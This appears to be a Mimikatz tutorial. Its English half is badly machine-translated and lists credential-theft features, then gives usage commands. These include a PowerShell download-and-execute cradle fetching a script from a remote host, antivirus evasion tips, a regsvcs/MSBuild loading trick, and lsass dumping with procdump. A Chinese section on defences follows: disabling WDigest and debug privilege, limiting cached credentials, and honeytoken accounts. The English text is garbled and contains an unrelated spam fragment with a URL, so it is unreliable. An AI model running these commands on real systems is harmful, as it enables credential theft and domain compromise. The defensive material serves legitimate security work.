Mimikatz for the Frenchman Benjamin Delpy written a lightweight debugging tools, including network penetration process, which is most of the time as a tool to grab a user's password. However Mimikatz actually not only grab the password function, it can create tickets, ticket delivery, hash passed, even fake domain management credentials token.
Features
-
CRYPTO :: Certificates - lists / export credentials.
-
KERBEROS :: Golden - create a golden ticket / silver ticket / ticket trust.
-
KERBEROS :: List - listed in the user's memory of all user's ticket (TGT and TGS).
-
KERBEROS :: PTT - ticket transfer.
-
LSADUMP :: DCSync - initiate a synchronization object to a DC (obtain the password data account) question.
-
LSADUMP :: LSA - a challenge to the LSA Server to retrieve data SAM / AD's (under normal circumstances or patch). DC can be either from a dump file lsass.dmp
-
Export all of the Active Directory domain credentials data. Also can obtain credentials for the specified account, such as krbtgt account, use / name parameters, such as: "/ name: krbtgt".
-
LSADUMP :: SAM - get the project data SysKey to decrypt the SAM (or export from the registry hive in) SAM option. It can be connected to the local Security Accounts Manager (SAM)
-
Database and can dump vouchers for local accounts. It can be used to dump all of the local credentials on a Windows computer.
-
LSADUMP :: Trust - a challenge to get to the LSA Server trust authentication information (normal case or patch) for the domain or forest trust dump all relevant key trusted (password)
-
MISC :: AddSid - to add a user account to the SID history. The first account is the target value, the second value is the account / group name (may be a plurality or SID). function () {// foreign currency with a single www.gendan5.com
-
MISC :: MemSSP - inject malicious Wndows SSP to record local authentication credentials.
-
MISC :: Skeleton - injected into the master key in the DC (Skeleton Key) to the LSASS process. This allows all users. Using a master key repair DC using "master password" (aka Skeleton Key) as well as their own passwords commonly used for authentication.
-
PRIVILEGE :: Debug - Debug get permission (many Mimikatz need Debug command authority or local SYSTEM privileges).
-
SEKURLSA :: Ekeys - lists the Kerberos Key
-
SEKURLSA :: Kerberos - Lists all authenticated user's Kerberos credentials (including service accounts and computer accounts)
-
SEKURLSA :: Krbtgt - obtain a Kerberos service account in the domain (KRBTGT) password data.
-
SEKURLSA :: LogonPasswords - lists all available credentials provider. This command will typically display the document recently logged in user and recently logged in the computer.
-
SEKURLSA :: Pth - Hash Key transfer and delivery (Note: Over-Pass-the-Hash process is actually transmitted the relevant Key (S))
-
SEKURLSA :: Tickets - recently listed all authenticated users of Kerberos tickets available, including the use of a user account context to run services and the local computer
-
Computer account in AD. And kerberos :: list is sekurlsa use different memory read, it will not be restricted key export.
-
TOKEN :: List - Lists all the token system.
-
TOKEN :: Elevate - counterfeit tokens. For permission to elevate rights SYSTEM (default) or domain administrator computer is found in the token.
-
TOKEN :: Elevate / domainadmin - a counterfeit token has domain administrator credentials.
Use list
# 001 generic implementation
privilege :: debug - elevated privileges
(Note: the need to run with administrator privileges)
sekurlsa::logonpasswords
Obtain login information saved in the memory
(Note: When the system is win10 or 2012R2 above, disable caching of plaintext passwords by modifying the registry can crawl the way memory by default, but the needs of the target machine reboot, log back in time to crawl.)
# 002 using powershell run Mimikatz
powershell -exec bypass "import-module ./Invoke-Cats.ps1;Invoke-Cats -pwds"
(Directly ps1 script execution, implementation of this method and the above EXE files, if not special treatment, it is easy to kill killed soft.)
powershell.exe "IEX (New-Object Net.WebClient).DownloadString ('http://1.1.1.1/InvokeCats.ps1');Invoke-Cats -pwds"
(This method utilizes the powershell mimikatz performed directly loaded into memory, the file can not reach the ground, through the portion of soft kill effect.)
# 003 using cscript run Mimikatz
cscript katz.js
( 'Note: This version Mimikatz JS has been the major soft-kill mark easily killed, but had to kill the soft JS version is also very simple, you can implement to avoid killing After a brief confusion, the presentation of the script passed to kill soft ')
# 004 using .NET 2.0 to perform Mimikatz
Performed in powershell
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='$Content = [System.Convert]::FromBase64String($key)Set-Content key.snk -Value $Content -Encoding Bytecsc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:regsvcs.dll /keyfile:key.snk/unsafe katz.csregsvcs.exe regsvcs.dll
#005 使用.NET 4.0 执行Mimikatz
MSBuild katz.xml
#006 使用wmic执行xsl版Mimikatz
#007 lsass内存转储
在任务管理中找到lsass.exe,将其转储出来。使用mimikatz离线导出信息
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
#008 使用procdump导出lsass内存(mysqldump也可以实现该功能)
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
防御措施
#001 禁止Debug Privilege
Debug Privilege 允许以特权用户启动的程序去调试本地系统运行的服务
如下图默认为Administrator
通过将 Debug Privilege 置空并重启服务器使其生效,再次使用 Mimikatz 的时候就会发现无法利用了
#002 WDigest
WDigest 是windows在XP系统中应用的,其作用主要是与超文本传输协议(HTTP)和简单的身份验证安全层(SASL)一起交换使用。而Digest与NTLM协议类似,也是挑战认证协议。
简单说就是:
1.客户端向服务端发起认证请求。
2.服务端返回一个随机值、客户端利用内存中的密码与客户端名,域名等信息计算一个值并发送至服务端。
3.服务端也利用相同方式计算一个值如果与客户端相同则认证成功。
在win 7 和 2008 r2 之前都是默认开启Wdigest且无法禁用,需要额外安装KB 2871997补丁(但是WIN7以及08以后的系统中微软都默认禁止了Wdigest协议)。
如下图所示(该系统为2008),在注册表WDigest中并没有 (UseLogonCredential)所以可以成功抓取到明文密码。
当安装完 KB 2871997 补丁后,需要使用以下命令:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0
来修改注册表。修改完毕后重新运行mimikatz就已经无法抓取明文密码了
#003 Domain Cached Credentials
Domain Cached Credentials 简称 DDC,也叫 mscache。有两个版本,XP/2003 年代的叫第一代,Vasta/2008 之后的是第二代。
计算机在加入域之后就得通过 kerberos 进行认证,通过 kerberos 认证就得有域控的参与,但是如果域成员暂时无法访问到域控的话,岂不是无法认证了?域凭证缓存就是为了解决这个问题的。如果暂时访问不到域控,windows 就尝试使用本机缓存的凭证进行认证,默认缓存十条。(引用:Mimikatz 攻防杂谈)
所以如果我们去修改默认缓存次数为0次,可能在一定程度上预防Mimikatz的攻击。
#004 利用伪造的域用户检测Mimikatz攻击
利用工具将虚假的域账户写入到域内服务器的内存中,当此类服务器受到mimikatz的攻击时,攻击者将会获取到我们投递的虚假账户信息,一但攻击者利用这些信息去登录域内机器的时候,我们便可以再IDS等监控设备上捕获到攻击。
总结
Mimikatz的攻击手法多样,变种繁多,要完全防御Mimikatz也是比较困难的。但是如果我们通过多种方式结合使用,还是能对Mimikatz起到一定的防御效果。
如果运维人员能够及时更新服务器操作系统,及时安装补丁,避免赋予账户过多管理权限,将重要账户加入保护组,域账户登录过的服务器一定要进行注销等操作,又或者投递虚假账户并进行监控等操作。这些在一定程度上还是能够有效的进行防御。